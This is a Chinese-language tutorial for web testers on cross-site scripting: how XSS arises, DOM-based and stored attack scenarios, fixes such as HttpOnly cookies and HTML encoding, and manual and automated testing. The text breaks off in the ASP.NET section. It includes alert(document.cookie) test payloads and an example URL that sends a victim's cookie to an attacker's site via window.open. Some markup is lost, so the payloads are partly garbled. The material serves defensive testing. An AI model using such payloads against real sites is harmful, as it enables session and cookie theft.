Web安全测试之XSS.doc

XSS 全称(Cross Site Scripting) 跨站脚本攻击， 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时，脚本就会在用户的浏览器上执行，从而达到攻击者的目的. 比如获取用户的Cookie，导航到恶意网站,携带木马等。作为测试人员，需要了解XSS的原理，攻击场景，如何修复。 才能有效的防止XSS的发生。阅读目录1. XSS 是如何发生的2. HTML Encode3. XSS 攻击场景4. XSS漏洞的修复5. 如何测试XSS漏洞6. HTML Encode 和URL Encode的区别7. 浏览器中的XSS过滤器8. ASP.NET中的XSS安全机制XSS 是如何发生的呢假如有下面一个textboxvalue1from是来自用户的输入，如果用户不是输入value1from,而是输入/alert(document.cookie)!-那么就会变成alert(document.cookie)嵌入的JavaScript代码将会被执行或者用户输入的是onfocus=alert(document.cookie) 那么就会变成事件被触发的时候嵌入的JavaScript代码将会被执行攻击的威力，取决于用户输入了什么样的脚本当然用户提交的数据还可以通过QueryString(放在URL中)和Cookie发送给服务器. 例如下图HTML EncodeXSS之所以会发生， 是因为用户输入的数据变成了代码。 所以我们需要对用户输入的数据进行HTML Encode处理。 将其中的中括号， “单引号”，“引号” 之类的特殊字符进行编码。在C#中已经提供了现成的方法，只要调用HttpUtility.HtmlEncode(string ) 就可以了。 （需要引用System.Web程序集）Fiddler中也提供了很方便的工具, 点击Toolbar上的TextWizard 按钮XSS 攻击场景1. Dom-Based XSS 漏洞 攻击过程如下Tom 发现了V中的一个页面有XSS漏洞，例如: /search.asp?term=apple服务器中Search.asp 页面的代码大概如下Results for .Tom 先建立一个网站, 用来接收“偷”来的信息。然后Tom 构造一个恶意的url(如下), 通过某种方式(邮件，QQ)发给Monica/search.asp?term=window.open(?cookie=+document.cookie)Monica点击了这个URL， 嵌入在URL中的恶意Javascript代码就会在Monica的浏览器中执行. 那么Monica在网站的cookie, 就会被发送到badguy网站中。这样Monica在 的信息就被Tom盗了.2. Stored XSS(存储式XSS漏洞), 该类型是应用广泛而且有可能影响大Web服务器自身安全的漏洞，攻击者将攻击脚本上传到Web服务器上，使得所有访问该页面的用户都面临信息泄露的可能。 攻击过程如下Alex发现了网站A上有一个XSS 漏洞，该漏洞允许将攻击代码保存在数据库中，Alex发布了一篇文章，文章中嵌入了恶意JavaScript代码。其他人如Monica访问这片文章的时候，嵌入在文章中的恶意Javascript代码就会在Monica的浏览器中执行，其会话cookie或者其他信息将被Alex盗走。Dom-Based XSS漏洞威胁用户个体，而存储式XSS漏洞所威胁的对象将是大量的用户.XSS 漏洞修复原则：不相信客户输入的数据注意: 攻击代码不一定在中1. 将重要的cookie标记为http only, 这样的话Javascript 中的document.cookie语句就不能获取到cookie了.2. 只允许用户输入我们期望的数据。 例如：年龄的textbox中，只允许用户输入数字。 而数字之外的字符都过滤掉。3. 对数据进行Html Encode 处理4. 过滤或移除特殊的Html标签， 例如: , , < for , " for5. 过滤JavaScript 事件的标签。例如 onclick=, onfocus 等等。如何测试XSS漏洞方法一： 查看代码，查找关键的变量, 客户端将数据传送给Web 服务端一般通过三种方式 Querystring, Form表单，以及cookie. 例如在ASP的程序中，通过Request对象获取客户端的变量假如变量没有经过htmlEncode处理， 那么这个变量就存在一个XSS漏洞方法二：准备测试脚本，/alert(document.cookie)!-alert(document.cookie)!-onclick=alert(document.cookie)在网页中的Textbox或者其他能输入数据的地方，输入这些测试脚本， 看能不能弹出对话框，能弹出的话说明存在XSS漏洞在URL中查看有那些变量通过URL把值传给Web服务器， 把这些变量的值退换成我们的测试的脚本。 然后看我们的脚本是否能执行方法三: 自动化测试XSS漏洞现在已经有很多XSS扫描工具了。 实现XSS自动化测试非常简单，只需要用HttpWebRequest类。 把包含xss 测试脚本。发送给Web服务器。 然后查看HttpWebResponse中，我们的XSS测试脚本是否已经注入进去了。HTML Encode 和URL Encode的区别刚开始我老是把这两个东西搞混淆, 其实这是两个不同的东西。HTML编码前面已经介绍过了，关于URL 编码是为了符合url的规范。因为在标准的url规范中中文和很多的字符是不允许出现在url中的。例如在baidu中搜索测试汉字。 URL会变成/s?wd=%B2%E2%CA%D4%BA%BA%D7%D6&rsv_bp=0&rsv_spt=3&inputT=7477所谓URL编码就是：把所有非字母数字字符都将被替换成百分号（%）后跟两位十六进制数，空格则编码为加号（+）在C#中已经提供了现成的方法，只要调用HttpUtility.UrlEncode(string ) 就可以了。 （需要引用System.Web程序集）Fiddler中也提供了很方便的工具, 点击Toolbar上的TextWizard 按钮浏览器中的XSS过滤器为了防止发生XSS， 很多浏览器厂商都在浏览器中加入安全机制来过滤XSS。 例如IE8，IE9，Firefox, Chrome. 都有针对XSS的安全机制。 浏览器会阻止XSS。 例如下图如果需要做测试， 最好使用IE7。ASP.NET中的XSS安全机制ASP.NET中有防范XSS的机